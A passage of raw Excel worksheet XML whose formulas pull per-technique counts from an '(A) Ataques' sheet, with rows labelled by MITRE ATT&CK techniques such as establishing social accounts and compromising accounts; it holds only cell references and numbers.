        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!BG96,"")</f>
        <v>1</v>
      </c>
      <c r="J96" s="530">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($F96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BH96,"")</f>
        <v>0</v>
      </c>
      <c r="L96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BJ96,"")</f>
        <v>0</v>
      </c>
      <c r="M96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BL96,"")</f>
        <v>0</v>
      </c>
      <c r="N96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BM96,"")</f>
        <v>0</v>
      </c>
      <c r="O96" s="532">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($K96=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P96" s="292">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BN96,"")</f>
        <v>3</v>
      </c>
      <c r="Q96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BP96,"")</f>
        <v>3</v>
      </c>
      <c r="R96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BR96,"")</f>
        <v>3</v>
      </c>
      <c r="S96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BS96,"")</f>
        <v>1</v>
      </c>
      <c r="T96" s="530">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($P96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BT96,"")</f>
        <v>3</v>
      </c>
      <c r="V96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BV96,"")</f>
        <v>3</v>
      </c>
      <c r="W96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BX96,"")</f>
        <v>3</v>
      </c>
      <c r="X96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$BY96,"")</f>
        <v>1</v>
      </c>
      <c r="Y96" s="532">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($U96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z96" s="288">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!BZ96,"")</f>
        <v>5</v>
      </c>
      <c r="AA96" s="392">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!CB96,"")</f>
        <v>3</v>
      </c>
      <c r="AB96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!CD96,"")</f>
        <v>3</v>
      </c>
      <c r="AC96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!CE96,"")</f>
        <v>2</v>
      </c>
      <c r="AD96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF(Z96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CF96,"")</f>
        <v>8</v>
      </c>
      <c r="AF96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CH96,"")</f>
        <v>6</v>
      </c>
      <c r="AG96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CJ96,"")</f>
        <v>6</v>
      </c>
      <c r="AH96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CK96,"")</f>
        <v>2</v>
      </c>
      <c r="AI96" s="287">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($AE96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ96" s="292">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CL96,"")</f>
        <v>0</v>
      </c>
      <c r="AK96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CN96,"")</f>
        <v>0</v>
      </c>
      <c r="AL96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CP96,"")</f>
        <v>0</v>
      </c>
      <c r="AM96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CQ96,"")</f>
        <v>0</v>
      </c>
      <c r="AN96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($AJ96=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CR96,"")</f>
        <v>0</v>
      </c>
      <c r="AP96" s="322">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CT96,"")</f>
        <v>0</v>
      </c>
      <c r="AQ96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CV96,"")</f>
        <v>0</v>
      </c>
      <c r="AR96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!$CW96,"")</f>
        <v>0</v>
      </c>
      <c r="AS96" s="287">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($AO96=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT96" s="288">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!CX96,"")</f>
        <v>3</v>
      </c>
      <c r="AU96" s="392">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!CZ96,"")</f>
        <v>3</v>
      </c>
      <c r="AV96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!DB96,"")</f>
        <v>3</v>
      </c>
      <c r="AW96" s="20">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!DC96,"")</f>
        <v>1</v>
      </c>
      <c r="AX96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($AT96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY96" s="469">
        <f>'(A) Ataques'!LU96+'(A) Ataques'!MA96+'(A) Ataques'!MG96+'(A) Ataques'!MM96+'(A) Ataques'!MS96</f>
        <v>0</v>
      </c>
      <c r="AZ96" s="510">
        <f>'(A) Ataques'!LW96+'(A) Ataques'!MC96+'(A) Ataques'!MI96+'(A) Ataques'!MO96+'(A) Ataques'!MU96</f>
        <v>0</v>
      </c>
      <c r="BA96" s="471">
        <f>'(A) Ataques'!LY96+'(A) Ataques'!ME96+'(A) Ataques'!MK96+'(A) Ataques'!MQ96+'(A) Ataques'!MW96</f>
        <v>0</v>
      </c>
      <c r="BB96" s="471">
        <f>'(A) Ataques'!LQ96</f>
        <v>0</v>
      </c>
      <c r="BC96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($AY96=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD96" s="469">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!LL96,"")</f>
        <v>2</v>
      </c>
      <c r="BE96" s="510">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!LM96,"")</f>
        <v>2</v>
      </c>
      <c r="BF96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!LN96,"")</f>
        <v>0</v>
      </c>
      <c r="BG96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!LO96,"")</f>
        <v>2</v>
      </c>
      <c r="BH96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!LS96,"")</f>
        <v>1</v>
      </c>
      <c r="BI96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($BD96=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ96" s="469">
        <f>'(A) Ataques'!OL96+'(A) Ataques'!OR96+'(A) Ataques'!OX96+'(A) Ataques'!PD96+'(A) Ataques'!PJ96</f>
        <v>0</v>
      </c>
      <c r="BK96" s="510">
        <f>'(A) Ataques'!ON96+'(A) Ataques'!OT96+'(A) Ataques'!OZ96+'(A) Ataques'!PF96+'(A) Ataques'!PL96</f>
        <v>0</v>
      </c>
      <c r="BL96" s="471">
        <f>'(A) Ataques'!OP96+'(A) Ataques'!OV96+'(A) Ataques'!PB96+'(A) Ataques'!PH96+'(A) Ataques'!PN96</f>
        <v>0</v>
      </c>
      <c r="BM96" s="495">
        <f>'(A) Ataques'!OH96</f>
        <v>0</v>
      </c>
      <c r="BN96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($BJ96=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO96" s="469">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!OC96,"")</f>
        <v>0</v>
      </c>
      <c r="BP96" s="510">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!OD96,"")</f>
        <v>0</v>
      </c>
      <c r="BQ96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!OE96,"")</f>
        <v>0</v>
      </c>
      <c r="BR96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!OF96,"")</f>
        <v>0</v>
      </c>
      <c r="BS96" s="471">
        <f>IF('(A) Ataques'!$AP96&lt;&gt;"NO",'(A) Ataques'!OJ96,"")</f>
        <v>0</v>
      </c>
      <c r="BT96" s="331">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",IF($BO96=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A97" s="79">
        <f t="shared" si="1"/>
        <v>95</v>
      </c>
      <c r="B97" s="4">
        <f>IF('(A) Ataques'!AK97&lt;&gt;"NO",'(A) Ataques'!E97,"")</f>
        <v>65</v>
      </c>
      <c r="C97" s="6" t="str">
        <f>IF('(A) Ataques'!AK97&lt;&gt;"NO",IF('(A) Ataques'!M97="","",'(A) Ataques'!M97),"")</f>
        <v>T1585.001-Establish_social_accounts</v>
      </c>
      <c r="D97" s="4" t="str">
        <f>IF('(A) Ataques'!AK97&lt;&gt;"NO",'(A) Ataques'!F97,"")</f>
        <v>T1585</v>
      </c>
      <c r="E97" s="286">
        <f>IF('(A) Ataques'!AK97&lt;&gt;"NO",'(A) Ataques'!AQ97,"")</f>
        <v>129</v>
      </c>
      <c r="F97" s="288">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!BB97,"")</f>
        <v>1675</v>
      </c>
      <c r="G97" s="392">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!BD97,"")</f>
        <v>312</v>
      </c>
      <c r="H97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!BF97,"")</f>
        <v>6</v>
      </c>
      <c r="I97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!BG97,"")</f>
        <v>125</v>
      </c>
      <c r="J97" s="530">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($F97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BH97,"")</f>
        <v>0</v>
      </c>
      <c r="L97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BJ97,"")</f>
        <v>0</v>
      </c>
      <c r="M97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BL97,"")</f>
        <v>0</v>
      </c>
      <c r="N97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BM97,"")</f>
        <v>0</v>
      </c>
      <c r="O97" s="532">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($K97=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P97" s="292">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BN97,"")</f>
        <v>1675</v>
      </c>
      <c r="Q97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BP97,"")</f>
        <v>312</v>
      </c>
      <c r="R97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BR97,"")</f>
        <v>6</v>
      </c>
      <c r="S97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BS97,"")</f>
        <v>125</v>
      </c>
      <c r="T97" s="530">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($P97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BT97,"")</f>
        <v>1676</v>
      </c>
      <c r="V97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BV97,"")</f>
        <v>312</v>
      </c>
      <c r="W97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BX97,"")</f>
        <v>6</v>
      </c>
      <c r="X97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$BY97,"")</f>
        <v>125</v>
      </c>
      <c r="Y97" s="532">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($U97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z97" s="288">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!BZ97,"")</f>
        <v>3</v>
      </c>
      <c r="AA97" s="392">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!CB97,"")</f>
        <v>3</v>
      </c>
      <c r="AB97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!CD97,"")</f>
        <v>1</v>
      </c>
      <c r="AC97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!CE97,"")</f>
        <v>3</v>
      </c>
      <c r="AD97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF(Z97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CF97,"")</f>
        <v>1679</v>
      </c>
      <c r="AF97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CH97,"")</f>
        <v>315</v>
      </c>
      <c r="AG97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CJ97,"")</f>
        <v>7</v>
      </c>
      <c r="AH97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CK97,"")</f>
        <v>125</v>
      </c>
      <c r="AI97" s="287">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($AE97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ97" s="292">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CL97,"")</f>
        <v>0</v>
      </c>
      <c r="AK97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CN97,"")</f>
        <v>0</v>
      </c>
      <c r="AL97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CP97,"")</f>
        <v>0</v>
      </c>
      <c r="AM97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CQ97,"")</f>
        <v>0</v>
      </c>
      <c r="AN97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($AJ97=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CR97,"")</f>
        <v>0</v>
      </c>
      <c r="AP97" s="322">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CT97,"")</f>
        <v>0</v>
      </c>
      <c r="AQ97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CV97,"")</f>
        <v>0</v>
      </c>
      <c r="AR97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!$CW97,"")</f>
        <v>0</v>
      </c>
      <c r="AS97" s="287">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($AO97=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT97" s="288">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!CX97,"")</f>
        <v>1675</v>
      </c>
      <c r="AU97" s="392">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!CZ97,"")</f>
        <v>312</v>
      </c>
      <c r="AV97" s="4">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!DB97,"")</f>
        <v>6</v>
      </c>
      <c r="AW97" s="20">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",'(A) Ataques'!DC97,"")</f>
        <v>125</v>
      </c>
      <c r="AX97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($AT97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY97" s="469">
        <f>'(A) Ataques'!LU97+'(A) Ataques'!MA97+'(A) Ataques'!MG97+'(A) Ataques'!MM97+'(A) Ataques'!MS97</f>
        <v>129</v>
      </c>
      <c r="AZ97" s="510">
        <f>'(A) Ataques'!LW97+'(A) Ataques'!MC97+'(A) Ataques'!MI97+'(A) Ataques'!MO97+'(A) Ataques'!MU97</f>
        <v>129</v>
      </c>
      <c r="BA97" s="471">
        <f>'(A) Ataques'!LY97+'(A) Ataques'!ME97+'(A) Ataques'!MK97+'(A) Ataques'!MQ97+'(A) Ataques'!MW97</f>
        <v>1</v>
      </c>
      <c r="BB97" s="471">
        <f>'(A) Ataques'!LQ97</f>
        <v>129</v>
      </c>
      <c r="BC97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($AY97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD97" s="469">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!LL97,"")</f>
        <v>129</v>
      </c>
      <c r="BE97" s="510">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!LM97,"")</f>
        <v>129</v>
      </c>
      <c r="BF97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!LN97,"")</f>
        <v>1</v>
      </c>
      <c r="BG97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!LO97,"")</f>
        <v>0</v>
      </c>
      <c r="BH97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!LS97,"")</f>
        <v>129</v>
      </c>
      <c r="BI97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($BD97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ97" s="469">
        <f>'(A) Ataques'!OL97+'(A) Ataques'!OR97+'(A) Ataques'!OX97+'(A) Ataques'!PD97+'(A) Ataques'!PJ97</f>
        <v>135</v>
      </c>
      <c r="BK97" s="510">
        <f>'(A) Ataques'!ON97+'(A) Ataques'!OT97+'(A) Ataques'!OZ97+'(A) Ataques'!PF97+'(A) Ataques'!PL97</f>
        <v>135</v>
      </c>
      <c r="BL97" s="471">
        <f>'(A) Ataques'!OP97+'(A) Ataques'!OV97+'(A) Ataques'!PB97+'(A) Ataques'!PH97+'(A) Ataques'!PN97</f>
        <v>2</v>
      </c>
      <c r="BM97" s="495">
        <f>'(A) Ataques'!OH97</f>
        <v>124</v>
      </c>
      <c r="BN97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($BJ97=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO97" s="469">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!OC97,"")</f>
        <v>135</v>
      </c>
      <c r="BP97" s="510">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!OD97,"")</f>
        <v>135</v>
      </c>
      <c r="BQ97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!OE97,"")</f>
        <v>2</v>
      </c>
      <c r="BR97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!OF97,"")</f>
        <v>1</v>
      </c>
      <c r="BS97" s="471">
        <f>IF('(A) Ataques'!$AP97&lt;&gt;"NO",'(A) Ataques'!OJ97,"")</f>
        <v>124</v>
      </c>
      <c r="BT97" s="331">
        <f>IF('(A) Ataques'!$AK97&lt;&gt;"NO",IF($BO97=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A98" s="79">
        <f t="shared" si="1"/>
        <v>96</v>
      </c>
      <c r="B98" s="4">
        <f>IF('(A) Ataques'!AK98&lt;&gt;"NO",'(A) Ataques'!E98,"")</f>
        <v>66</v>
      </c>
      <c r="C98" s="6" t="str">
        <f>IF('(A) Ataques'!AK98&lt;&gt;"NO",IF('(A) Ataques'!M98="","",'(A) Ataques'!M98),"")</f>
        <v>T1586.001-Compromise_Accounts</v>
      </c>
      <c r="D98" s="4" t="str">
        <f>IF('(A) Ataques'!AK98&lt;&gt;"NO",'(A) Ataques'!F98,"")</f>
        <v>T1586</v>
      </c>
      <c r="E98" s="286">
        <f>IF('(A) Ataques'!AK98&lt;&gt;"NO",'(A) Ataques'!AQ98,"")</f>
        <v>6951</v>
      </c>
      <c r="F98" s="288">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!BB98,"")</f>
        <v>21291</v>
      </c>
      <c r="G98" s="392">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!BD98,"")</f>
        <v>5739</v>
      </c>
      <c r="H98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!BF98,"")</f>
        <v>1</v>
      </c>
      <c r="I98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!BG98,"")</f>
        <v>5739</v>
      </c>
      <c r="J98" s="530">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($F98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BH98,"")</f>
        <v>3652</v>
      </c>
      <c r="L98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BJ98,"")</f>
        <v>2147</v>
      </c>
      <c r="M98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BL98,"")</f>
        <v>15</v>
      </c>
      <c r="N98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BM98,"")</f>
        <v>1253</v>
      </c>
      <c r="O98" s="532">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($K98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P98" s="292">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BN98,"")</f>
        <v>24943</v>
      </c>
      <c r="Q98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BP98,"")</f>
        <v>7886</v>
      </c>
      <c r="R98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BR98,"")</f>
        <v>16</v>
      </c>
      <c r="S98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BS98,"")</f>
        <v>5955</v>
      </c>
      <c r="T98" s="530">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($P98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BT98,"")</f>
        <v>656724</v>
      </c>
      <c r="V98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BV98,"")</f>
        <v>15339</v>
      </c>
      <c r="W98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BX98,"")</f>
        <v>51</v>
      </c>
      <c r="X98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$BY98,"")</f>
        <v>6166</v>
      </c>
      <c r="Y98" s="532">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($U98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z98" s="288">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!BZ98,"")</f>
        <v>29203</v>
      </c>
      <c r="AA98" s="392">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!CB98,"")</f>
        <v>10983</v>
      </c>
      <c r="AB98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!CD98,"")</f>
        <v>29</v>
      </c>
      <c r="AC98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!CE98,"")</f>
        <v>6950</v>
      </c>
      <c r="AD98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF(Z98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CF98,"")</f>
        <v>676263</v>
      </c>
      <c r="AF98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CH98,"")</f>
        <v>23264</v>
      </c>
      <c r="AG98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CJ98,"")</f>
        <v>80</v>
      </c>
      <c r="AH98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CK98,"")</f>
        <v>6950</v>
      </c>
      <c r="AI98" s="287">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($AE98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ98" s="292">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CL98,"")</f>
        <v>0</v>
      </c>
      <c r="AK98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CN98,"")</f>
        <v>0</v>
      </c>
      <c r="AL98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CP98,"")</f>
        <v>0</v>
      </c>
      <c r="AM98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CQ98,"")</f>
        <v>0</v>
      </c>
      <c r="AN98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($AJ98=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CR98,"")</f>
        <v>10190</v>
      </c>
      <c r="AP98" s="322">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CT98,"")</f>
        <v>6728</v>
      </c>
      <c r="AQ98" s="4">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CV98,"")</f>
        <v>46</v>
      </c>
      <c r="AR98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!$CW98,"")</f>
        <v>3231</v>
      </c>
      <c r="AS98" s="287">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($AO98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT98" s="288">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!CX98,"")</f>
        <v>35133</v>
      </c>
      <c r="AU98" s="392">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!CZ98,"")</f>
        <v>14614</v>
      </c>
      <c r="AV98" s="4">
